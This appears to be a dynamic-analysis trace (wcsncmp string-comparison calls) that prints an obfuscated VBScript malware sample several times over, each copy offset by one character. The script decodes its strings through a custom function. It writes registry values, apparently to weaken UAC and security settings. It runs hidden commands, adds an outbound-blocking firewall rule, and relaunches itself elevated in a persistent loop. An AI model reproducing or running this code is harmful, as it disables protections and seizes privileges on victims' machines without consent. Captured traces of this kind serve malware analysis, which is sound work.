bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.376] wcsncmp (_String1="cationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.376] wcsncmp (_String1="ationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.376] wcsncmp (_String1="tionname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.376] wcsncmp (_String1="ionname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0226.376] wcsncmp (_String1="onname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite 